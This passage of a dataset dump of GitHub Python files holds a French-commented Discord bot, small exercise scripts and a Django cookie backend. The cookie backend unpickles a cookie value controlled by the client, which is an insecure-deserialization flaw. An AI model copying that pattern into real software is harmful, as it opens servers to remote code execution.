= dict() #associe à un message son pendant sur un autre salon\n self.auteur: Dict[Message, str] = dict() #associe à un message le pseudo de son auteur\n\n def salonInGroupe(self: 'Groupe', channelId: ChannelID) -> bool:\n return any(x.getLabel() == channelId for x in self.getNodes())\n def addChannel(self: 'Groupe', channelId: ChannelID) -> None:\n autresNodes = self.getNodeIds()\n self.addNode(channelId, autresNodes, autresNodes)\n def remChannel(self: 'Groupe', channelId: ChannelID) -> None:\n for idNode, node in self.nodes.items():\n if node.getLabel() == channelId:\n self.removeNodeById(idNode)\n def getNodeChannel(self: 'Groupe', channelId: ChannelID) -> Optional[Node]:\n for node in self.getNodes():\n if node.getLabel() == channelId:\n return node\n\n def autresSalons(self: 'Groupe', channelId: ChannelID) -> Set[ChannelID]:\n nodeChannel = self.getNodeChannel(channelId)\n return {self.nodes[idChild].getLabel() for idChild in nodeChannel.getChildrenIds()}\n\n def ajoutMsg(self: 'Groupe', idOriginal: Message, idCopie: Message, channelIdOriginal: ChannelID, channelIdCopie: ChannelID, auteur: str) -> None:\n self.originaux[idCopie] = (idOriginal, channelIdOriginal)\n self.copiesGuild[idCopie, channelIdOriginal] = idOriginal\n self.copiesGuild[idOriginal, channelIdCopie] = idCopie\n self.auteur[idOriginal] = auteur\n self.auteur[idCopie] = auteur\n\n if idOriginal not in self.copies:\n self.copies[idOriginal] = {(idCopie, channelIdCopie)}\n else:\n self.copies[idOriginal].add((idCopie, channelIdCopie))\n\n def copiesMessage(self: 'Groupe', idMsg: Message) -> Set[Tuple[Message, ChannelID]]:\n if idMsg in self.copies: #idMsg est un message original, c'est facile de retrouver ses copies\n return self.copies[idMsg]\n else: #idMsg est une copie par le bot, il faut retrouver l'original et les copies de l'original - idMsg\n original = self.originaux[idMsg]\n return {original} | {x for x in self.copies[original] if x[0] != idMsg}\n def copieDansSalon(self: 'Groupe', idMsg: Message, channelId: ChannelID) -> Optional[Message]:\n if (idMsg, channelId) in self.copiesGuild: #ça ne marche que si idMsg est le message original\n return self.copiesGuild[idMsg, channelId]\n else: #sinon, il faut retrouver l'original\n msgOriginal, channelOriginal = self.originaux[idMsg]\n #par construction le truc suivant existe forcément\n return self.copiesGuild[msgOriginal, channelId]\n def auteurMsg(self: 'Groupe', idMsg: Message) -> str:\n return self.auteur[idMsg]\n\nstockePID()\n\n#on récupère les constantes dans le pickle\ncheminPickle = os.path.join(cheminOutputs, \"discordutils.p\")\n\ntry:\n INFOS = dict() if not os.path.exists(cheminPickle) else pickle.load(open(cheminPickle, \"rb\"))\nexcept:\n INFOS = dict()\n\nif True:\n BLANK = \"\" * 3\n\n if \"VOCAL_ROLE\" not in INFOS: INFOS[\"VOCAL_ROLE\"] = dict()\n VOCAL_ROLE = INFOS[\"VOCAL_ROLE\"]\n\n if \"AUTO_ROLE\" not in INFOS: INFOS[\"AUTO_ROLE\"] = dict()\n AUTO_ROLE = INFOS[\"VOCAL_ROLE\"]\n\n if \"BIND_NEW\" not in INFOS: INFOS[\"BIND_NEW\"] = dict()\n BIND_NEW = INFOS[\"BIND_NEW\"]\n\n if \"AUTO_ASSO\" not in INFOS: INFOS[\"AUTO_ASSO\"] = dict()\n AUTO_ASSO = INFOS[\"AUTO_ASSO\"]\n\n if \"AUTO_ROLE_CONF\" not in INFOS: INFOS[\"AUTO_ROLE_CONF\"] = dict()\n AUTO_ROLE_CONF = INFOS[\"AUTO_ROLE_CONF\"]\n\n if \"AUTO_PINS\" not in INFOS: INFOS[\"AUTO_PINS\"] = dict()\n AUTO_PINS = INFOS[\"AUTO_PINS\"]\n\n if \"CLOSE\" not in INFOS: INFOS[\"CLOSE\"] = set()\n CLOSE = INFOS[\"CLOSE\"]\n\n if \"MODO\" not in INFOS: INFOS[\"MODO\"] = dict()\n MODO = INFOS[\"MODO\"]\n\ndef save():\n pickle.dump(INFOS, open(cheminPickle, \"wb\"))\n\ndef estAdmin(usrId): return usrId in ADMINS\n\n\n#TRUCS UTILES ##################################################################\ndef resendFile(url, nomFichier):\n cheminSave = os.path.join(cheminOutputs, nomFichier)\n r = requests.get(url)\n with open(cheminSave, \"wb\") as f:\n f.write(r.content)\n\n return discord.File(cheminSave)\n\ndef supprFichier(fichierDiscord):\n chemin = os.path.join(cheminOutputs, fichierDiscord.filename)\n os.remove(chemin)\n################################################################################\n\nasync def dmChannelUser(user):\n if user.dm_channel is None:\n await user.create_dm() #crée le dm channel, et après user.dm_channel est remplacé par l'objet représentant le dm channel\n return user.dm_channel\n\nasync def bind_new_envoi(msg):\n if msg.content.startswith(BLANK) or msg.author.discriminator == \"0000\": return\n channelId = msg.channel.id\n guildId = msg.guild.id if msg.guild else msg.guild\n\n\n if channelId in BIND_NEW:\n if msg.content == \"\" and msg.embeds == [] and msg.attachments == []: return #c'est un message système qu'on ne veut pas transmettre\n\n groupe = BIND_NEW[BIND_NEW[channelId]]\n auteur, texte, files = msg.author, msg.content, lambda: [resendFile(x.url, x.filename) for x in msg.attachments]\n embeds = msg.embeds\n reference = msg.reference\n pseudoAuteur = auteur.nick or auteur.name\n\n embed = None if embeds == [] or auteur.id != bot.user.id else embeds[0]\n affiNom = f\"{pseudoAuteur} ({msg.guild.name if msg.guild else 'DM'})\"\n texteRenvoye = BLANK + \"**@{} :**\\n{}\".format(affiNom, texte)\n\n for channelCibleId, serveurCibleId in groupe.autresSalons((channelId, guildId)):\n serveur = bot.get_guild(serveurCibleId)\n channel = serveur.get_channel(channelCibleId)\n fichiersHere = files()\n\n if reference:\n referenceId = reference.message_id\n pendantRefChannel = groupe.copieDansSalon(referenceId, (channelCibleId, serveurCibleId))\n objRef = discord.MessageReference(message_id = pendantRefChannel, channel_id = channelCibleId)\n\n retransmis = await channel.send(texteRenvoye, reference = objRef, files = fichiersHere, embed = embed)\n else:\n webhook = discord.utils.get((await channel.webhooks()), name=auteur.name)\n if webhook is None:\n webhook = await channel.create_webhook(name = auteur.name)\n\n retransmis = await webhook.send(texte, wait = True, files = fichiersHere, embed = embed, username = affiNom, avatar_url = auteur.avatar.url)\n #retransmis = await channel.send(texteRenvoye, files = fichiersHere, embed = embed)\n\n groupe.ajoutMsg(msg.id, retransmis.id, (channelId, guildId), (channelCibleId, serveurCibleId), pseudoAuteur)\n\n map(supprFichier, fichiersHere)\n sleep(0.4)\n\n if randint(0, 10) == 0: save()\n\nasync def bind_new_edit(msg):\n channelId = msg.channel.id\n guildId = msg.guild.id if msg.guild else msg.guild\n if msg.author.id == 689536409060900933 or msg.author.discriminator == \"0000\": return #on ne fait rien si le bot modifie son propre message\n\n if channelId in BIND_NEW:\n groupe = BIND_NEW[BIND_NEW[channelId]]\n texte, embeds = msg.content, msg.embeds\n pseudoAuteur = groupe.auteurMsg(msg.id)\n\n texteRenvoye = BLANK + \"**@{} ({}) :**\\n{}\".format(pseudoAuteur, msg.guild.name if msg.guild else \"DM\", texte)\n for channelCibleId, serveurCibleId in groupe.autresSalons((channelId, guildId)):\n serveur = bot.get_guild(serveurCibleId)\n channel = serveur.get_channel(channelCibleId)\n\n echoId = groupe.copieDansSalon(msg.id, (channelCibleId, serveurCibleId))\n echo = await channel.fetch_message(echoId)\n if echo.reference:\n await echo.edit(content = texteRenvoye)\n else:\n webhook = discord.utils.get((await channel.webhooks()), name = pseudoAuteur)\n if webhook is None:\n webhook = await channel.create_webhook(name = pseudoAuteur)\n\n await webhook.edit_message(echoId, content = texte)\n\nasync def bind_new_del(msg):\n channelId = msg.channel.id\n guildId = msg.guild.id if msg.guild else msg.guild\n\n if channelId in BIND_NEW:\n groupe = BIND_NEW[BIND_NEW[channelId]]\n\n for channelCibleId, serveurCibleId in groupe.autresSalons((channelId, guildId)):\n try:\n serveur = bot.get_guild(serveurCibleId)\n channel = serveur.get_channel(channelCibleId)\n\n echoId = groupe.copieDansSalon(msg.id, (channelCibleId, serveurCibleId))\n echo = await channel.fetch_message(echoId)\n await echo.delete()\n sleep(0.4)\n except:\n print(\"Mon développeur a triché !\")\n\nasync def bind_new_react_add(reaction, user, bot):\n msg = reaction.message\n channelId = msg.channel.id\n guildId = msg.guild.id\n\n if user.id == 689536409060900933: return #on ne retransmet pas les réactions déjà faites par le bot\n\n if channelId in BIND_NEW:\n groupe = BIND_NEW[BIND_NEW[channelId]]\n\n for channelCibleId, serveurCibleId in groupe.autresSalons((channelId, guildId)):\n serveur = bot.get_guild(serveurCibleId)\n channel = serveur.get_channel(channelCibleId)\n\n echoId = groupe.copieDansSalon(msg.id, (channelCibleId, serveurCibleId))\n echo = await channel.fetch_message(echoId)\n await echo.add_reaction(reaction.emoji)\n sleep(0.4)\n\nasync def bind_new_react_del(reaction, bot):\n pass\n\nasync def bind_new_pin_event(channel, last_pin):\n channelId = channel.id\n guildId = channel.guild.id\n\n if last_pin and channelId in BIND_NEW: #sinon, c'est qu'on a retiré un pin (et pour le moment on ne fait rien)\n lastPinMsg = (await channel.pins())[0]\n groupe = BIND_NEW[BIND_NEW[channelId]]\n\n for channelCibleId, serveurCibleId in groupe.autresSalons((channelId, guildId)):\n serveur = bot.get_guild(serveurCibleId)\n channel = serveur.get_channel(channelCibleId)\n\n echoId = groupe.copieDansSalon(lastPinMsg.id, (channelCibleId, serveurCibleId))\n echo = await channel.fetch_message(echoId)\n try:\n await echo.pin()\n except:\n print(\"Mon développeur a triché\")\n sleep(0.4)\n\nasync def vocalrole_voicestate(member, before, after):\n channelBefore = before.channel and before.channel.id\n #si before.channel est None, il reste None, sinon on prend directement l'id du channel\n channelAfter = after.channel and after.channel.id\n guild = member.guild\n\n if guild.id in VOCAL_ROLE:\n rolesGuild = VOCAL_ROLE[guild.id]\n\n if channelBefore in rolesGuild and (channelAfter not in rolesGuild or (channelAfter in rolesGuild and rolesGuild[channelBefore] != rolesGuild[channelAfter])):\n retraitRole = guild.get_role(rolesGuild[channelBefore])\n await member.remove_roles(retraitRole)\n\n if channelAfter in rolesGuild and (channelBefore not in rolesGuild or (channelBefore in rolesGuild and rolesGuild[channelBefore] != rolesGuild[channelAfter])):\n nouvRole = guild.get_role(rolesGuild[channelAfter])\n await member.add_roles(nouvRole)\n\nasync def autorole_react_add(messageId, member, guild, emoji, add = True):\n if (messageId, emoji) in AUTO_ROLE:\n roleId = AUTO_ROLE[messageId, emoji]\n role = guild.get_role(roleId)\n\n if add and role not in member.roles:\n await member.add_roles(role)\n elif not add and role in member.roles:\n await member.remove_roles(role)\n\nasync def autorole_react_del(messageId, member, guild, emoji):\n await autorole_react_add(messageId, member, guild, emoji, False)\n\nasync def autoroleconf_react_add(messageId, member, guild, emoji):\n print(messageId, emoji, (messageId, emoji) in AUTO_ROLE_CONF, len(AUTO_ROLE_CONF))\n if (messageId, emoji) in AUTO_ROLE_CONF:\n roleId, channelConfId, pingConfId, serveurAutoId, roleAutoId, toWhoId = AUTO_ROLE_CONF[messageId, emoji]\n role = guild.get_role(roleId)\n\n dm = await dmChannelUser(member)\n\n roleConfirme = toWhoId is not None\n if not roleConfirme:\n if role in member.roles: #si le membre a déjà le rôle, ça vaut comme une confirmation automatique\n roleConfirme = True\n elif serveurAutoId is not None:\n serveurAuto = bot.get_guild(serveurAutoId)\n roleAuto = serveurAuto.get_role(roleAutoId)\n\n try:\n memberAutreServeur = await serveurAuto.fetch_member(member.id)\n except: #le membre n'est pas dans l'autre serveur\n roleConfirme = False\n else:\n roleConfirme = roleAuto in memberAutreServeur.roles\n\n if roleConfirme:\n if toWhoId:\n member = await guild.fetch_member(toWhoId)\n dm = await dmChannelUser(member)\n\n await member.add_roles(role)\n await dm.send(f\"**__Serveur {guild.name}__**\\nC'est bon, ton rôle est confirmé !\")\n\n if toWhoId:\n del AUTO_ROLE_CONF[messageId, emoji]\n save()\n else:\n channelConf = guild.get_channel(channelConfId)\n\n msgConf = await channelConf.send(f\"<@&{pingConfId}> : {member.mention} prétend être du groupe {role.name}. C'est vrai ?\")\n await msgConf.add_reaction(\"👍\")\n\n AUTO_ROLE_CONF[msgConf.id, \"👍\"] = (roleId, channelConfId, pingConfId, serveurAutoId, roleAutoId, member.id)\n\n save()\n\n await dm.send(f\"**__Serveur {guild.name}__**\\nTu as dit être dans le groupe {role.name}, ce sera confirmé par les admins bientôt.\")\n\nasync def autoasso_react_add(messageId, member, guild, emoji):\n messagesVerifies = (813413525560361010, 813413830918406224) #questions entrée\n messageAcces = 820709722860027915\n roleMembreServeurAsso = 811670434315239424\n memberId = member.id\n\n if messageId in messagesVerifies: #on répond à une question du \"qcm\" d'entrée, on enregistre la question à laquelle le membre a répondu\n if memberId in AUTO_ASSO:\n AUTO_ASSO[memberId].add(messageId)\n else:\n AUTO_ASSO[memberId] = {messageId}\n\n save()\n\n elif messageId == messageAcces: #on demande l'accès en acceptant le règlement\n if memberId not in AUTO_ASSO or len(AUTO_ASSO[memberId]) != len(messagesVerifies): #le qcm n'a pas été répondu\n channel = await dmChannelUser(member)\n\n await channel.send(f\"**Arrivée sur le serveur de l'API des Passionnés d'Informatique**\\nMerci d'avoir rejoint le serveur ! Pour y avoir accès, svp mettez bien des réactions aux {len(messagesVerifies)} messages au-dessus de celui qui permet d'accepter le règlement, puis remettre la réaction pour accepter le règlement.\\nÀ bientôt !\")\n else: #le qcm a été répondu, on donne l'accès au reste du serveur\n role = guild.get_role(roleMembreServeurAsso)\n await member.add_roles(role)\n await channel.send(f\"**Arrivée sur le serveur de l'API des Passionnés d'Informatique**\\nMerci ! Vous avez maintenant accès au reste du serveur.\")\n\nasync def autopin_react_add(messageId, member, guild, emoji, channel):\n if emoji == \"📌\": #c'est un pin !\n if messageId not in AUTO_PINS:\n AUTO_PINS[messageId] = {member.id}\n else:\n AUTO_PINS[messageId].add(member.id)\n\n save()\n\n if len(AUTO_PINS[messageId]) == 5: #on a 5 personnes qui demandent un pin, on le fait\n msg = await channel.fetch_message(messageId)\n\n try:\n await msg.pin()\n except:\n await channel.send(\"Le bot n'a pas le droit d'épingler des messages ici\")\n\nasync def autopin_react_del(messageId, member, guild, emoji, channel):\n if emoji == \"📌\":\n if messageId in AUTO_PINS:\n AUTO_PINS[messageId].remove(member.id)\n\n save()\n\n if len(AUTO_PINS[messageId]) < 5:\n msg = await channel.fetch_message(messageId)\n\n try:\n await msg.unpin()\n except:\n pass\n\nasync def envoiAutoSuppr(msg, bot):\n if msg.guild and msg.guild.id in MODO and msg.author.id != bot.user.id:\n try:\n channel = await bot.fetch_channel(MODO[msg.guild.id])\n except: #on n'a pas bien récupéré le salon, donc en fait on a 1 id de user, pas de salon\n channel = await bot.fetch_user(MODO[msg.guild.id])\n\n embeds, files = msg.embeds, lambda: [resendFile(x.url, x.filename) for x in msg.attachments]\n embed = None if embeds == [] or msg.author.id != bot.user.id else embeds[0]\n fichierHere = files()\n await channel.send(f\"{str(msg.created_at)} - {str(msg.channel.name)} - {msg.author.nick or msg.author.name} : {msg.content}\", files = fichierHere, embed = embed)\n\nasync def close_envoi(msg):\n channelId = msg.channel.id\n if channelId in CLOSE:\n try:\n await msg.delete()\n except:\n pass\n\ndef main():\n bot = commands.Bot(command_prefix = prefixeBot, help_command = None, intents = discord.Intents.all())\n\n @bot.event #pour ne pas afficher les messages d'erreur de commande inexistante (typiquement si on utilise une commande du bot squadro qui est gérée par un autre script)\n async def on_command_error(ctx, error):\n if isinstance(error, commands.CommandNotFound):\n return\n raise error\n\n @bot.event\n async def on_message_edit(_, msg):\n await bind_new_edit(msg)\n\n @bot.event\n async def on_message_delete(msg):\n await bind_new_del(msg)\n await envoiAutoSuppr(msg, bot)\n\n @bot.event\n async def on_member_join(member):\n bans = []\n for guild in bot.guilds:\n try:\n bans += list(x.user.id for x in (await guild.bans()))\n except: pass\n\n try:\n if member.id in bans:\n await member.ban()\n except:\n pass\n\n async def traitementRawReact(payload):\n if payload.guild_id and payload.user_id != bot.user.id: #sinon, on est dans le cas d'une réaction en dm\n messageId = payload.message_id\n guild = bot.get_guild(payload.guild_id)\n user = await guild.fetch_member(payload.user_id)\n channel = bot.get_channel(payload.channel_id)\n\n partEmoji = payload.emoji\n emojiHash = partEmoji.id if partEmoji.is_custom_emoji() else partEmoji.name\n\n return locals()\n else:\n return None\n\n @bot.event\n async def on_raw_reaction_add(payload):\n traitement = await traitementRawReact(payload)\n if traitement:\n messageId = traitement[\"messageId\"]\n user = traitement[\"user\"]\n guild = traitement[\"guild\"]\n emojiHash = traitement[\"emojiHash\"]\n channel = traitement[\"channel\"]\n\n await autorole_react_add(messageId, user, guild, emojiHash)\n await autoasso_react_add(messageId, user, guild, emojiHash)\n await autoroleconf_react_add(messageId, user, guild, emojiHash)\n await autopin_react_add(messageId, user, guild, emojiHash, channel)\n\n @bot.event\n async def on_raw_reaction_remove(payload):\n traitement = await traitementRawReact(payload)\n if traitement:\n messageId = traitement[\"messageId\"]\n user = traitement[\"user\"]\n guild = traitement[\"guild\"]\n emojiHash = traitement[\"emojiHash\"]\n channel = traitement[\"channel\"]\n\n await autorole_react_del(messageId, user, guild, emojiHash)\n await autopin_react_del(messageId, user, guild, emojiHash, channel)\n\n @bot.event\n async def on_reaction_add(reaction, user):\n await bind_new_react_add(reaction, user, bot)\n @bot.event\n async def on_reaction_clear_emoji(reaction):\n await bind_new_react_del(reaction, bot)\n\n @bot.event\n async def on_voice_state_update(member, before, after):\n await vocalrole_voicestate(member, before, after)\n\n\n @bot.event\n async def on_message(msg):\n #liaison de salon\n await bind_new_envoi(msg)\n await bot.process_commands(msg)\n await close_envoi(msg)\n\n @bot.event\n async def on_guild_channel_pins_update(channel, last_pin):\n await bind_new_pin_event(channel, last_pin)\n\n #bind channels\n @bot.command(name = \"utils_bind\")\n async def bind(ctx, salonSource: discord.TextChannel, serveurCible: int, salonCible: int):\n if not estAdmin(ctx.author.id): return\n\n salonSource = salonSource.id\n serveurSource = ctx.guild.id\n\n if salonSource in BINDED_CHANNELS:\n cible = BINDED_CHANNELS[salonSource]\n else:\n cible = set()\n BINDED_CHANNELS[salonSource] = cible\n\n cible.add((serveurCible, salonCible))\n\n if salonCible in BINDED_CHANNELS:\n cible = BINDED_CHANNELS[salonCible]\n else:\n cible = set()\n BINDED_CHANNELS[salonCible] = cible\n\n cible.add((serveurSource, salonSource))\n\n await ctx.message.add_reaction(\"👌\")\n\n save()\n\n @bot.command(name = \"utils_unbind\")\n async def unbind(ctx, salonSource: discord.TextChannel):\n if not estAdmin(ctx.author.id): return\n\n salonSource = salonSource.id\n\n if salonSource in BINDED_CHANNELS:\n for (_, channel) in BINDED_CHANNELS[salonSource]:\n BINDED_CHANNELS[channel] = {(x, y) for x, y in BINDED_CHANNELS[channel] if y != salonSource}\n\n BINDED_CHANNELS[salonSource] = set()\n await ctx.message.add_reaction(\"👌\")\n else:\n await ctx.send(\"Ce salon n'était pas relié aux autres\")\n\n save()\n\n #bind new\n @bot.command(name = \"create_bind\")\n async def createBind(ctx):\n if ctx.author.guild_permissions.administrator or estAdmin(ctx.author.id):\n int_to_hex = lambda x: hex(x)[2:]\n idGroupe = int_to_hex(randint(1000000, 9999999))\n BIND_NEW[idGroupe] = Groupe()\n\n await ctx.send(f\"Id du groupe : {idGroupe}. Pour ajouter un nouveau salon, il faut lancer la commande `{prefixeBot}bind {idGroupe}`\")\n\n save()\n\n @bot.command(name = \"bind\")\n async def bindnew(ctx, nomGroupe: str):\n channelId = ctx.channel.id\n guildId = ctx.guild.id if ctx.guild else ctx.guild\n\n if ctx.author.guild_permissions.administrator or estAdmin(ctx.author.id):\n if nomGroupe in BIND_NEW and (channelId not in BIND_NEW or BIND_NEW[channelId] == nomGroupe):\n groupe = BIND_NEW[nomGroupe]\n if groupe.salonInGroupe((channelId, guildId)):\n await ctx.message.add_reaction(\"❔\")\n else:\n groupe.addChannel((channelId, guildId))\n BIND_NEW[channelId] = nomGroupe\n\n await ctx.message.add_reaction(\"👌\")\n save()\n elif nomGroupe in BIND_NEW and channelId in BIND_NEW and BIND_NEW[channelId] != nomGroupe:\n groupeOld = BIND_NEW[BIND_NEW[channelId]]\n groupeOld.remChannel((channelId, guildId))\n\n groupe = BIND_NEW[nomGroupe]\n groupe.addChannel((channelId, guildId))\n BIND_NEW[channelId] = nomGroupe\n\n await ctx.message.add_reaction(\"👌\")\n save()\n else:\n await ctx.message.add_reaction(\"❌\")\n\n @bot.command(name = \"del_bind\")\n async def delBind(ctx, nomGroupe: str):\n if ctx.author.guild_permissions.administrator or estAdmin(ctx.author.id):\n if nomGroupe in BIND_NEW:\n for node in BIND_NEW[nomGroupe].getNodes():\n channelId, guildId = node.getLabel()\n del BIND_NEW[channelId]\n\n del BIND_NEW[nomGroupe]\n await ctx.message.add_reaction(\"👌\")\n\n save()\n else:\n await ctx.message.add_reaction(\"❔\")\n\n #vocal role\n @bot.command(name = \"utils_vocalbind\")\n async def vocalbind(ctx, role: discord.Role, salonVocalId: int):\n if not estAdmin(ctx.author.id): return\n\n guildId = role.guild.id\n\n if guildId not in VOCAL_ROLE:\n VOCAL_ROLE[guildId] = dict()\n\n VOCAL_ROLE[guildId][salonVocalId] = role.id\n await ctx.message.add_reaction(\"👌\")\n\n save()\n\n @bot.command(name = \"utils_vocalunbind\")\n async def vocalunbind(ctx, role: discord.Role):\n if not estAdmin(ctx.author.id): return\n\n guildId = role.guild.id\n roleId = role.id\n\n if guildId in VOCAL_ROLE:\n if roleId in VOCAL_ROLE[guildId].values():\n for salon in (x for x, y in VOCAL_ROLE.items() if y == roleId):\n del VOCAL_ROLE[guildId][roleId]\n\n await ctx.message.add_reaction(\"👌\")\n\n save()\n return\n\n await ctx.send(\"Inutile\")\n\n #autorole\n @bot.command(name = \"utils_autorole\")\n async def autorole(ctx, role: discord.Role, message: discord.Message, emoji: Union[discord.Emoji, str]):\n if ctx.author.guild_permissions.manage_roles or ctx.author.guild_permissions.administrator or estAdmin(ctx.author.id):\n emojiHash = emoji.id if isinstance(emoji, discord.Emoji) else emoji\n messageId = message.id\n\n if (messageId, emojiHash) not in AUTO_ROLE:\n AUTO_ROLE[messageId, emojiHash] = role.id\n\n try:\n await message.add_reaction(emoji)\n except:\n pass\n await ctx.message.add_reaction(\"👌\")\n else:\n del AUTO_ROLE[messageId, emojiHash]\n await ctx.message.add_reaction(\"👌\")\n await ctx.message.add_reaction(\"❌\")\n\n try:\n await message.remove_reaction(emoji, bot.user)\n except:\n pass\n\n save()\n\n #autorole avec confirmation (sauf reconnaissance automatique)\n @bot.command(name = \"utils_autoroleconf\")\n async def autoroleconf(ctx, role: discord.Role, message: discord.Message, emoji: Union[discord.Emoji, str], channelConf: discord.TextChannel, pingConf: discord.Role, serveurAutoId: Optional[int], roleAutoId: Optional[int]):\n if estAdmin(ctx.author.id):\n emojiHash = emoji.id if isinstance(emoji, discord.Emoji) else emoji\n messageId = message.id\n\n AUTO_ROLE_CONF[messageId, emojiHash] = (role.id, channelConf.id, pingConf.id, serveurAutoId, roleAutoId, None)\n\n try:\n await message.add_reaction(emoji)\n await ctx.message.add_reaction(\"👌\")\n except:\n pass\n\n save()\n\n @bot.command(name = \"utils_autoroleconf_reset\")\n async def autoroleconfreset(ctx):\n if estAdmin(ctx.author.id):\n AUTO_ROLE_CONF.clear()\n await ctx.message.add_reaction(\"👌\")\n\n save()\n\n #fermeture ouverture d'un salon\n @bot.command(name = \"open\")\n async def open(ctx):\n if ctx.author.guild_permissions.administrator or ctx.author.guild_permissions.manage_messages:\n CLOSE.remove(ctx.channel.id)\n save()\n await ctx.message.add_reaction(\"👌\")\n\n @bot.command(name = \"close\")\n async def close(ctx):\n if ctx.author.guild_permissions.administrator or ctx.author.guild_permissions.manage_messages:\n CLOSE.add(ctx.channel.id)\n save()\n await ctx.message.add_reaction(\"👌\")\n\n @bot.command(name = \"avatar\")\n async def avatar(ctx, someone: Optional[discord.User]):\n if someone is None:\n someone = ctx.author\n\n ref = discord.MessageReference(channel_id = ctx.channel.id, message_id = ctx.message.id)\n embed = discord.Embed()\n embed.set_image(url=someone.avatar.url)\n await ctx.send(embed=embed, reference = ref)\n\n\n @bot.command(name=\"redirMsg\")\n async def toto(ctx, guildId: int):\n guild = bot.get_guild(guildId)\n if guild:\n member = await guild.fetch_member(ctx.author.id)\n\n if member.guild_permissions.administrator:\n if guildId not in MODO:\n MODO[guildId] = ctx.channel.id\n else:\n del MODO[guildId]\n await ctx.message.add_reaction(\"👌\")\n\n save()\n\n return bot, TOKEN\n\nif __name__ == \"__main__\":\n bot, token = main()\n\n bot.run(token)\n","repo_name":"fabnem12/squadro-bot","sub_path":"discordUtils/discordutils.py","file_name":"discordutils.py","file_ext":"py","file_size_in_byte":30062,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"16"}
+{"seq_id":"31276111018","text":"def main():\n n = int(input())\n terms = []\n s = 0\n i = 1\n while s <= n:\n s += i\n terms.append(i)\n i += 1\n\n del terms[s - n - 1]\n print(len(terms))\n print(*terms)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"e1fe12/learn_python","sub_path":"p02/various_terms.py","file_name":"various_terms.py","file_ext":"py","file_size_in_byte":246,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"41667139670","text":"import math\n\ntop3elves = [0,0,0]\ntop3max = [0,0,0]\n\ncurrentSum = 0\ncurrentElf = 1\n\nwith open(\"day1-input.txt\", \"r\") as f:\n for line in f:\n\n if line.strip():\n currentSum += int(line)\n else:\n if currentSum > min(top3max) :\n top3elves[top3max.index(min(top3max))] = currentElf\n top3max[top3max.index(min(top3max))] = currentSum\n\n currentElf += 1\n currentSum = 0\n \n \n\nfinalAnswer=zip(top3elves,top3max)\n\nfor elf, cal in finalAnswer:\n print(f\"Elf {elf} has {cal} calories\")\n\nprint(f\"the total is {sum(top3max)}\")","repo_name":"MaryGz/adventCalendar2022","sub_path":"day1.2-solution.py","file_name":"day1.2-solution.py","file_ext":"py","file_size_in_byte":611,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"27217689095","text":"# import numpy\nimport numpy as np\n\n# set a random seed to replicate the results\nnp.random.seed(42)\n\n# import matplotlib to visualize the experiment\nimport matplotlib.pyplot as plt\n\n#When we repeat an experiment a large number of times, the average result will be very close to the expected result, i.e. in the long run, random events tend to average out at the expected value. \n#Example: Flipping a coin\n#If we flipped a coin just 10 times we would not be surprised to get 7 heads (even though the expected value is 5).\n#But if we flip it 10,000 times we are very unlikely to get 7,000 heads. The result will likely be within a few percent of 5,000.\n#Let's simulate this coin-flipping example with Python.\n\n\n# generate ten random numbers (0 or 1) with equal probabilities\ncoin_flips_10 = np.random.randint(0,2,10)\n\n# how many heads in 10 coin flips\ncount_heads = sum(coin_flips_10 == 1)\nprint(count_heads)\n\n# empty list used to store the results\nheads_ratio_nflips = []\n\n# generate integers from 5 to 10,000\nn_flips = np.arange(5,10000)\n\nfor flips in n_flips:\n # how many heads / flips\n heads_ratio = sum(np.random.randint(0,2,flips) == 1) / flips\n\n # append ratios\n heads_ratio_nflips.append(heads_ratio)\n \n # set plot size\nplt.figure(figsize=(10,8))\n\n# number of flips on the x axe and heads ratio on y axe\nplt.plot(n_flips, heads_ratio_nflips)\n\n# expected ratio\nplt.plot(n_flips, len(n_flips)*[0.5], 'r--')\n\n# plot settings\nplt.figure(figsize=(10,8))\nplt.xlabel('Flips')\nplt.ylabel('Heads ratio')\nplt.show()\n","repo_name":"RaghavanArun/lighthouse-python-fundamentals","sub_path":"prep_course_statistics-master/The Law of Large Numbers.py","file_name":"The Law of Large Numbers.py","file_ext":"py","file_size_in_byte":1529,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"22765037008","text":"try:\n import cPickle as pickle\nexcept ImportError:\n import pickle\n\nfrom .base import Backend\n\nfrom datetime import datetime, timedelta\n\nfrom backward import settings\n\n\nclass CookieBackend(Backend):\n def get_url_redirect(self, request):\n return request.COOKIES.get(settings.URL_REDIRECT_NAME, None)\n\n def save_url_redirect(self, request, response, url_redirect):\n self.set_cookie(request, response, url_redirect, cookie_name=settings.URL_REDIRECT_NAME)\n\n def get_next_action(self, request):\n if settings.NEXT_ACTION_NAME in request.COOKIES:\n return pickle.loads(request.COOKIES[settings.NEXT_ACTION_NAME])\n\n return {}\n\n def save_next_action(self, request, response, data):\n self.set_cookie(request,\n response,\n pickle.dumps(data, pickle.HIGHEST_PROTOCOL),\n cookie_name=settings.NEXT_ACTION_NAME)\n\n def delete_next_action(self, request, response):\n response.delete_cookie(settings.NEXT_ACTION_NAME, domain=self.get_cookie_domain(request))\n\n def set_cookie(self, request, response, value, cookie_name):\n max_age = settings.COOKIE_MAX_AGE\n\n expires = datetime.strftime(datetime.utcnow() + timedelta(seconds=max_age),\n \"%a, %d-%b-%Y %H:%M:%S GMT\")\n\n try:\n response.set_cookie(cookie_name,\n value,\n max_age=max_age,\n expires=expires,\n domain=self.get_cookie_domain(request),\n secure=settings.COOKIE_SECURE or None)\n except UnicodeEncodeError:\n return False\n\n return True\n\n def get_cookie_domain(self, request):\n cookie_domain = settings.COOKIE_DOMAIN\n\n if cookie_domain and cookie_domain.startswith('.'):\n host = '.'.join(request.get_host().split('.')[-2:])\n\n cookie_domain = cookie_domain % {\n 'host': host\n }\n\n return cookie_domain\n","repo_name":"thoas/django-backward","sub_path":"backward/backends/cookie.py","file_name":"cookie.py","file_ext":"py","file_size_in_byte":2093,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"16"}
